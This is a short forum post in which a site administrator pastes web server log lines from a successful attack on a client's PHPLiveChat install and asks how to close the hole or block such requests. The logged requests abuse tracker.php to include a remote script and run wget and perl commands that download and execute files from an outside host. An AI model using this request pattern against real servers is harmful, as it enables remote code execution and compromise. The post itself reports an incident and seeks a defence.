PHPLiveChat - Security Hole

200.138.208.43 - - [30/Jul/2004:00:23:06 -0400] "GET /asp/tracker.php?uid=0&action=initst&Uid=http://www.excs.hpg.ig.com.br/barbie.txt?&cmd=cd%20/var/tmp/;wget%20www.excs.hpg.ig.com.br/bbb HTTP/1.1" 200 580 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.138.208.43 - - [30/Jul/2004:00:23:50 -0400] "GET /asp/tracker.php?uid=0&action=initst&Uid=http://www.excs.hpg.ig.com.br/barbie.txt?&cmd=cd%20/var/tmp/;wget%20www.excs.hpg.ig.com.br/bnc.conf HTTP/1.1" 200 591 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.138.208.43 - - [30/Jul/2004:00:24:09 -0400] "GET /asp/tracker.php?uid=0&action=initst&Uid=http://www.excs.hpg.ig.com.br/barbie.txt?&cmd=cd%20/var/tmp/;perl%20bbb HTTP/1.1" 200 62 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.138.208.43 - - [02/Aug/2004:17:38:42 -0400] "GET /asp/tracker.php?uid=0&action=initst&Uid=http://www.excs.hpg.ig.com.br/barbie.txt?&cmd=uname%20-a HTTP/1.1" 200 185 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.138.208.43 - - [02/Aug/2004:17:39:07 -0400] "GET /asp/tracker.php?uid=0&action=initst&Uid=http://www.excs.hpg.ig.com.br/barbie.txt?&cmd=cd%20/var/tmp/;wget%20www.excs.hpg.ig.com.br/lol.txt HTTP/1.1" 200 588 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


One of my clients just got hacked like that. Is there any way to close that security bug in PHPLiveChat? Any way to block those kinds of requests using mod_rewrite or something temporarily (like blocking "wget" in URLs)?

- Matt

 

 

 

 

Top